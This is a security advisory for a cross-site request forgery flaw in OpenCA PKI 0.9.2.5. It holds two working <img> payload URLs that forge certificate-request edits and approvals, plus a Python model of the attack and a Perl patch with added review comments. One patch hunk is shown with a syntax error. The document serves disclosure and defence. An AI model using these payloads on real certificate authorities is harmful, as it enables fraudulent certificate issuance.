AKLINK-SA-2008-001.txt
Posted Feb 14, 2008
Authored by Alexander Klink | Site cynops.de

OpenCA version 0.9.2.5 suffers from a cross site request forgery vulnerability.

tags | advisory, csrf
advisories | CVE-2008-0556
SHA-256 | c8cc08a802f0472bdd435e3b3e2dacbf30c477ffb9c1ff098f2c5e82d42a1001

============================================
||| Security Advisory AKLINK-SA-2008-001 |||
||| CVE-2008-0556 (CVE candidate) |||
============================================

OpenCA - Cross Site Request Forgery (XSRF)
==========================================

Date released: 13.02.2008
Date reported: 12.12.2007
$Revision: 1.1 $

by Alexander Klink
Cynops GmbH
a.klink@cynops.de
https://www.cynops.de/advisories/CVE-2008-0556.txt
(S/MIME signed:
https://www.cynops.de/advisories/CVE-2008-0556-signed.txt)
https://www.klink.name/security/aklink-sa-2008-001-openca-xsrf.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0556

Vendor: OpenCA LABS
Product: OpenCA PKI
Website: http://www.openca.org/projects/openca/
Vulnerability: Cross Site Request Forgery
Class: remote
Status: unpatched
Severity: high (arbitrary issuance of certificates without the knowledge
and/or consent of a registration officer)
Releases known to be affected: 0.9.2.5, possibly 0.9.2.x (untested)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

The OpenCA PKI Project (v0.9) is a collaborative effort to develop a
robust, full-featured and Open Source out-of-the-box Certification
Authority implementing the most used protocols with full-strength
cryptography world-wide.

Disclaimer: I am actively involved in OpenXPKI, a project with similar
goals that "inherited" most of OpenCA's core developers.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

OpenCA suffers from a typical cross-site request forgery (XSRF) problem:
an authenticated user (a registration officer, for example) can be
tricked into executing actions on the CA without his knowledge and
consent. For a CA this is especially severe, because the actions that
can be forged include modifying and approving certificate requests, so
an attacker can obtain arbitrary certificates this way.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

Users are authenticated by a session cookie, and the links and forms that
trigger actions on the CA carry no anti-XSRF token. The browser attaches
the cookie to every request to the CA host regardless of which page
originated it, and the actions are reachable with a plain GET, so an
attacker only has to place the request URL in, for example, the src of an
<img> tag on another website. If the victim has an active session on the
CA, the action is executed with the victim's privileges.

Examples:
<img
src="https://hostname/cgi-bin/ra/RAServer?cmd=changeCSR&dataType=NEW_REQUEST&key=57888&SUBJECT_ATTRIBUTE_0_0=CN&SUBJECT_VALUE_0_0=&SUBJECT_ATTRIBUTE_2_0=O&SUBJECT_VALUE_2_0=XSRF+Org&SUBJECT_ATTRIBUTE_1_0=CN&SUBJECT_VALUE_1_0=XSRF+CN&SUBJECT_ATTRIBUTE_3_0=DC&SUBJECT_VALUE_3_0=example&SUBJECT_ATTRIBUTE_4_0=DC&SUBJECT_VALUE_4_0=com&SUBJECT_ALT_NAME_ATTRIBUTE_0=DNS&SUBJECT_ALT_NAME_VALUE_0=xsrfsan"/>
<img
src="https://hostname/cgi-bin/ra/RAServer?head=&cmd=approveCSRnotSigned&signature=&dataType=PENDING_REQUEST&text=-----BEGIN%20HEADER-----%0ASERIAL%20=%2058912%0A-----END%20HEADER-----%0A-----BEGIN%20CERTIFICATE%20REQUEST-----%0AMIIBqjCCARMCAQAwajELMAkGA1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUx%0AITAfBgNVBAoTGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDEjMCEGA1UEAxMabXlo%0Ab3N0bmFtZS5leGFtcGxlLmNvbTo0NDMwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJ%0AAoGBAJSFtl67sEEZ88wyj0uxgVKlaMl%2FifSNLZPblqlCu%2BhgF3DHhFe80z5DxUk8%0AEbChgri9cVMfhK7IkInxEr6Cuz3Jv651IKX2XL4GsL1ZxZzQ8u3ywClSBVk5jBk7%0Ax7qHw%2FkyU8DNDqIJXY2ZkWAeGty7vMGyPTWRanFO8oIGO%2F7bAgMBAAGgADANBgkq%0AhkiG9w0BAQUFAAOBgQCQhWQrs54Jb8GIn8q3l2OHkmXXM5HV8aDwffwipcGPZHe9%0ANtc3be0xSQDt1q4rEikMKDVR1WTm5FubXs7ZQpDPbVU5t%2BM%2B%2BUuRbUmdP7PYlttR%0AnMg%2BEzZKP4S%2BOp4iZRA8cyqJQaJ63aQ2KzGp%2FBx7nPTjdH%2FnX3vN4tHhC1tKcw%3D%3D%0A-----END%20CERTIFICATE%20REQUEST-----%0A&key=58912"/>

Valid request serials (the key and SERIAL values above) have to be
guessed in these cases, but that is no obstacle if the attacker has
access to the public frontend: he can then create a certificate request
himself and have that request changed and approved via XSRF. Serials are
(more or less) consecutive, so guessing is relatively easy in any case.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

* 12.12.2007: Reported bug to the openca-core mailing list (the private
mailing list of core developers) via Martin Bartosch
* 17.12.2007: Martin Bartosch forwards the mail directly to the project
maintainer, Massimiliano Pala
* 02.01.2008: Asked for a contact to a release coordinator on the
openca-devel mailing list
* 01.02.2008: Sent patch to openca-core and Massimiliano Pala with the
announcement to release advisory and patch if no reply is
received by February 10th

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

Apply the following patch. It introduces an XSRF protection token
parameter, the SHA-1 hex digest of the session ID (CGISESSID), and adds
it to all internal links and forms. For every command that is not on a
small allowlist of read-only commands (genMenu, serverInfo,
getStaticPage) the server recomputes the digest from the session and
rejects the request if the parameter is missing or does not match. The
scheme holds because a page on another origin cannot read the victim's
cookie and therefore cannot compute the token. As no help from the
current OpenCA developers was available to us, this patch is not very
well tested. It works for us - use at your own risk.
Note that it introduces a dependency on Digest::SHA1. That module is a
separate CPAN distribution rather than part of Perl core, although most
operating system distributions package it; the core module Digest::SHA
exports an identical sha1_hex and can be substituted.
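The attack from the Technical details section and the token check the patch introduces, modelled end to end in Python as an added example. This is not OpenCA's code nor the author's patch (OpenCA is Perl); it shows why the forged <img> request is accepted without the fix and refused with it. The cookie name CGISESSID, the parameter name xsrf_protection_token, the exempt commands and the RAServer URL come from the advisory; the session ID, the page fixture and the function names are constructed for the example. Two deliberate deviations from the patch are marked in comments: the link rewriter matches cmd= at any position in any path, and the token comparison is constant-time.

```python
"""Model of the OpenCA XSRF attack and of the token check the patch adds.

Added example, not OpenCA code or the advisory's patch (OpenCA is Perl).
Names taken from the advisory: cookie CGISESSID, parameter
xsrf_protection_token, the exempt commands, the RAServer URL. Session ID,
page fixture and function names are constructed for this example.
"""
import hashlib
import hmac
import re
from html import unescape
from urllib.parse import parse_qs, urlsplit

SESSION_COOKIE = "CGISESSID"
TOKEN_PARAM = "xsrf_protection_token"
# Commands the patch exempts (read-only; a forged call changes nothing).
NOT_VULNERABLE_CMDS = frozenset({"genMenu", "serverInfo", "getStaticPage"})


def xsrf_token(session_id):
    """Token as the patch derives it: hex SHA-1 of the session ID. It is
    secret only because the attacker's origin cannot read the CA's cookie."""
    return hashlib.sha1(session_id.encode("utf-8")).hexdigest()


def add_token_to_links(page, session_id):
    """Append the token to every href that carries cmd= (what the patch's
    addXSRFProtectionTokenToLinks does). Unlike the patch's regex this
    matches any path and cmd= at any position, so no link is left without
    a token only to be rejected later. Forms get the token as a hidden
    field in the same way and are omitted here."""
    token = xsrf_token(session_id)
    pattern = re.compile(r'(href="[^"]*\?(?:[^"]*[&;])?cmd=[^"]*)')
    return pattern.sub(lambda m: f'{m.group(1)}&amp;{TOKEN_PARAM}={token}', page)


def params_from_url(url):
    """Flatten a request URL's query string the way a CGI script sees it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in query.items()}


def check_request(cookies, params):
    """Server-side gate modelled on the AC.pm hunk. Returns (allowed, reason).
    A missing token compares unequal to the expected one, so it is refused
    exactly like a wrong token."""
    session_id = cookies.get(SESSION_COOKIE)
    if session_id is None:
        return False, "no session"
    cmd = params.get("cmd")
    if cmd is None or cmd in NOT_VULNERABLE_CMDS:
        return True, "no token required"
    expected = xsrf_token(session_id).encode("ascii")
    supplied = params.get(TOKEN_PARAM, "").encode("utf-8")
    # constant-time comparison; the patch uses a plain string `ne`
    if not hmac.compare_digest(supplied, expected):
        return False, "potential XSRF attack"
    return True, "ok"


# Constructed fixtures: a victim's session, the attacker's <img src> (the
# advisory's first example, shortened; 57888 is the guessed request serial)
# and a page as the RA interface would render it for the victim.
VICTIM_SESSION = "c0ffee0123456789abcdef0123456789"
FORGED_IMG_URL = ("https://hostname/cgi-bin/ra/RAServer?cmd=changeCSR"
                  "&dataType=NEW_REQUEST&key=57888&SUBJECT_VALUE_1_0=XSRF+CN")
RA_PAGE = ('<a href="/cgi-bin/ra/RAServer?cmd=approveCSRnotSigned&amp;key=58912">approve</a>\n'
           '<a href="/cgi-bin/ra/RAServer?cmd=genMenu">menu</a>\n')


def first_href(page):
    """Extract the first href of a rendered page, HTML-unescaped."""
    return unescape(re.search(r'href="([^"]*)"', page).group(1))


def demo():
    """The cases a reviewer of the patch wants to see; returns the verdicts."""
    cookies = {SESSION_COOKIE: VICTIM_SESSION}
    rendered = add_token_to_links(RA_PAGE, VICTIM_SESSION)
    return {
        # attacker page: the browser sends the cookie, but there is no token
        "forged_img": check_request(cookies, params_from_url(FORGED_IMG_URL)),
        # link rendered by the CA for this session: token present and correct
        "legit_link": check_request(cookies, params_from_url(first_href(rendered))),
        # a token belonging to some other session does not transfer
        "other_session_token": check_request(
            cookies, {"cmd": "approveCSRnotSigned", TOKEN_PARAM: xsrf_token("other")}),
        # exempt read-only command passes without a token
        "menu": check_request(cookies, {"cmd": "genMenu"}),
    }


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case:20s} {verdict}")
```

Run it directly to see the four verdicts. The token is a deterministic function of the session ID, so it does not have to be stored server-side, but it is also constant for the whole session and appears in GET URLs, which is why the patch's GET-based links deserve the Referer caveat raised in the review notes below the hunks.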

diff -ru OpenCA-0.9.2.5.orig/src/modules/openca-ac/AC.pm
OpenCA-0.9.2.5/src/modules/openca-ac/AC.pm
--- OpenCA-0.9.2.5.orig/src/modules/openca-ac/AC.pm 2008-01-14
15:05:16.000000000 +0100
+++ OpenCA-0.9.2.5/src/modules/openca-ac/AC.pm 2008-01-15
10:23:11.000000000 +0100
@@ -34,7 +34,7 @@
use OpenCA::Log::Message;

use FileHandle;
-
+use Digest::SHA1 qw( sha1_hex );

my $is_ldaps;

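Review bot: `use Digest::SHA1 qw( sha1_hex );` pulls in a CPAN-only module; Digest::SHA1 has never shipped with Perl core, whereas Digest::SHA (core since 5.9.3) exports the same `sha1_hex`. Consider `use Digest::SHA qw( sha1_hex );` so the patch installs without an extra dependency, and say so in the advisory text.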
@@ -781,6 +781,7 @@
## return undef;
## }

+ my @not_vulnerable_cmds = qw( genMenu serverInfo getStaticPage );
if (not $self->getSession ()) {
if (not $self->login ()) {
return undef;
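Review bot: `my @not_vulnerable_cmds = qw( genMenu serverInfo getStaticPage );` is a hard-coded allowlist that is the whole boundary of the protection, and nothing in the hunk says how it was derived; a comment stating the criterion (commands that only read, so a forged call changes nothing) and that any new command is token-gated unless added here would stop the next read-only command from breaking, or a state-changing one from being exempted without thought.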
@@ -795,6 +796,11 @@
$self->{journal}->{login}->{role} = $self->{ident}->{role};
$self->{journal}->{session_id} = $self->{session}->getID();
$self->{journal}->{session_type} = "cookie";
+ if (defined $self->{cgi}->param('cmd') &&
+ (! grep { $_ eq $self->{cgi}->param('cmd'} }
@not_vulnerable_cmds)) {
+ # only the above commands should be called after a login
+ return undef;
+ }
return $h;
}
} else {
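Review bot: `(! grep { $_ eq $self->{cgi}->param('cmd'} }` closes `param(` with `}` instead of `)`, so this hunk does not compile as shown; it should read `param('cmd')} @not_vulnerable_cmds)`. The intent, refusing a non-exempt `cmd` that arrives in the same request as the login, is right: a forged login with a command attached would otherwise run before any token exists, since the token check further down is only reached on an established session.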
@@ -804,6 +810,25 @@
$self->stopSession;
return $self->checkIdent;
}
+
+ # XSRF checks
+ my $potentially_vulnerable;
+ if (defined $self->{cgi}->param('cmd')) {
+ $potentially_vulnerable = 1;
+ }
+ if (grep {$_ eq $self->{cgi}->param('cmd')} @not_vulnerable_cmds) {
+ $potentially_vulnerable = 0;
+ }
+
+ if ($potentially_vulnerable &&
+ ($self->{cgi}->param('xsrf_protection_token')
+ ne sha1_hex($self->{session}->getID()))) {
+ # potential XSRF attack
+ $self->debug('Potential XSRF attack');
+ $self->debug('XSRF token: ' .
$self->{cgi}->param('xsrf_protection_token'));
+ $self->debug('SHA1 hash of session ID: ' .
sha1_hex($self->{session}->getID()));
+ return undef;
+ }
return $self->{session}->update();
}
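Review bot: the check is keyed entirely off `defined $self->{cgi}->param('cmd')`, so a request with no `cmd` parameter is never token-checked; that is fine only if every state-changing action is dispatched through `cmd`, and that assumption deserves a comment next to `$potentially_vulnerable`. Two smaller points: the `grep` on the following line runs even when `cmd` is undefined and then evaluates `$_ eq undef`, which warns under `use warnings` (move it inside the `if (defined ...)` block), and the two `$self->debug` lines write the expected token, valid for the life of the session, into the debug log; logging that the check failed is enough.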

diff -ru OpenCA-0.9.2.5.orig/src/modules/openca-ui-html/HTML.pm
OpenCA-0.9.2.5/src/modules/openca-ui-html/HTML.pm
--- OpenCA-0.9.2.5.orig/src/modules/openca-ui-html/HTML.pm 2008-01-14
15:05:16.000000000 +0100
+++ OpenCA-0.9.2.5/src/modules/openca-ui-html/HTML.pm 2008-01-15
09:07:17.000000000 +0100
@@ -26,6 +26,7 @@
use CGI;
use Locale::Messages (':locale_h');
use Locale::Messages (':libintl_h');
+use Digest::SHA1 qw( sha1_hex );

use FileHandle;
our ($STDERR, $STDOUT);
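Review bot: the token derivation `sha1_hex(<session id>)` now lives in both HTML.pm and AC.pm, with a second `use Digest::SHA1` to match; a single helper (for instance a method on the session object both modules already hold) would keep the two sides from drifting and would make a later switch to a random per-session token a one-line change.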
@@ -482,6 +483,8 @@
}
$page .=
' </table>'."\n";
+ my $xsrf_protection_token = sha1_hex($self->{CGI}->param('CGISESSID'));
+ $keys->{HIDDEN_LIST}->{xsrf_protection_token} = $xsrf_protection_token;
if (exists $keys->{HIDDEN_LIST})
{
my $list = $keys->{HIDDEN_LIST};
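Review bot: the page side derives the token from `$self->{CGI}->param('CGISESSID')` while AC.pm verifies against `$self->{session}->getID()`; this only works if the session ID is present as a request parameter on every rendered page, not merely in the cookie as the advisory text describes, otherwise `param` returns undef, the emitted token is the hash of the empty string and every form is rejected. Reading the ID from the session object here would remove that dependency. Minor: assigning `$keys->{HIDDEN_LIST}->{xsrf_protection_token}` autovivifies HIDDEN_LIST, so the `if (exists $keys->{HIDDEN_LIST})` that follows is now always true.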
@@ -502,11 +505,22 @@
' </form>'."\n".
' </body>'."\n".
'</html>'."\n";
+ $page = $self->addXSRFProtectionTokenToLinks($page);
$self->sendContentType();
print $STDOUT $page;
return 1;
}

+sub addXSRFProtectionTokenToLinks {
+ my $self = shift;
+ my $page = shift;
+ my $session_id = $self->{CGI}->param('CGISESSID');
+ my $xsrf_protection_token = sha1_hex($session_id);
+
+ $page =~
s/(href="[a-zA-Z\/\-]*\?cmd=[^"]+)/$1;xsrf_protection_token=$xsrf_protection_token/g;
+ return $page;
+}
+
sub libSendMenu {

my $self = shift;
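Review bot: the substitution in `addXSRFProtectionTokenToLinks` only matches an href whose path consists of `[a-zA-Z\/\-]` and whose query starts with `cmd=`; a link with a digit, dot or underscore in the path, or with `cmd` as a later parameter, gets no token and is then refused by AC.pm, so the regex fails closed but silently breaks those links. A pattern such as `href="[^"?]*\?[^"]*cmd=` would cover them. It also appends the parameter with `;`, which CGI.pm accepts but other clients and log parsers may not treat as a separator. Separately, because the token is now part of GET URLs, it travels in the Referer header to any external resource reached from a CA page and into proxy logs and browser history; since it is constant for the session, a leaked value lets an attacker build a working forged request for that session, which the advisory should state.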
@@ -542,6 +556,7 @@
' </body>'."\n".
'</html>';

+ $page = $self->addXSRFProtectionTokenToLinks($page);
print $STDOUT $page;
return 1;
}
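Review bot: this is the second of three renderers that gets `$page = $self->addXSRFProtectionTokenToLinks($page);` inserted directly before `print $STDOUT $page;`; any renderer that is missed, now or when one is added later, emits token-less links that AC.pm rejects. Routing all three through one output helper that performs the rewrite and the print would make the coverage structural rather than per call site.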
@@ -630,6 +645,7 @@
' </form>'."\n".
' </body>'."\n".
'</html>'."\n";
+ $page = $self->addXSRFProtectionTokenToLinks($page);
print $STDOUT $page;
return 1;
}

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:

- Alexander Klink, Cynops GmbH (discovery and patch)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Thanks:

- Jürgen Brauckmann (DFN-CERT) for providing helpful input during the
patch development

--
Dipl.-Math. Alexander Klink | IT-Security Engineer | a.klink@cynops.de
mobile: +49 (0)178 2121703 | Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
HRB 7833, Amtsgericht | USt-Id: DE 213094986 | Geschäftsführer:
Bad Homburg v. d. Höhe | | Martin Bartosch